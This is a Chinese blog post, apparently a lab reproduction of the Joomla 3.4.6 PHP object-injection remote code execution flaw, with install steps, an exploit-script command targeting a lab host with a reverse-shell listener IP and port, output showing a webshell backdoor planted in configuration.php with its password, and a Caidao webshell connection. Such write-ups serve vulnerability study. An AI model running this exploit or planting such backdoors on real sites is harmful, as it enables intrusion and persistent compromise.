Joomla-3.4.6远程代码执行复现

v2-a61b3759dc48b31963e86ec13b90f46c_b.jpg


​影响范围

Joomla3.0.0 至 3.4.6

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

漏洞原理

Joomla会话以 PHPObjects 的形式存储在数据库中,并且由 PHP 会话函数处理。但是未认证用户的会话也可以进行存储,因此攻击者通过精心构造的请求包,通过 PHP 对象注入,可以导致未认证的远程代码执行。

1、安装部署

下载:downloads.joomla.org/it

浏览器访问http://127.0.0.1/Joomla/3.4.6/安装

配置


v2-409187340a52332c46b6b19e0f98b7a9_b.jpg


数据库


v2-cd932fb3f4548ec450dd6712e3af7d99_b.jpg


安装


v2-8072f23a7c886b35a7561fd904dfb281_b.jpg


安装成功

github.com/SecurityCN/V


v2-ea77c5ab842971b39eb49c86d339add9_b.jpg


python3Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l192.168.0.105-p4444


v2-0816fdb686f65f4613009cc56e4ce42d_b.jpg


执行成功反弹shell并在“configuration.php”写入随机密码的一句话木马

localhost:Joomla3.4.6-RCE fuwei$ python3 Joomla-3.4.6-RCE.py -t 10.211.55.3/joomla/ -e -l 192.168.0.105 -p 4444[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Vulnerable[*] Getting Session Cookie ..[*] Getting CSRF Token ..[*] Sending request ..[+] Backdoor implanted, eval your code at 10.211.55.3/joomla//con in a POST with fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf[*] Now it's time to reverse, trying with a system + perl

可以用NC 监听和菜刀连接由于我的PHP是Windows环境所以无法反弹只能通过菜刀连接

caidao密码为 fvyvnyltqherkhcqlderuyodbduxehuptliptfmxlbvfyejmcf


v2-55ad6c364949447124d61ccb42ceceff_b.jpg


菜刀连接成功


v2-b28c7cda7ab5a6559a77998ead608f53_b.jpg


​修复方案:

强烈建议用户前往官方下载更新至最新版本

官方地址downloads.joomla.org

附:cxsecurity.com/issue/WL

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

公众号:


v2-be16fc9802cb2dd23f77ec16f33951f8_b.jpg


thelostworld:


v2-20e48f777f98d9c420a04d5037b12820_b.jpg


个人知乎:zhihu.com/people/fu-wei


个人简书:jianshu.com/u/bf0e38a8d

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值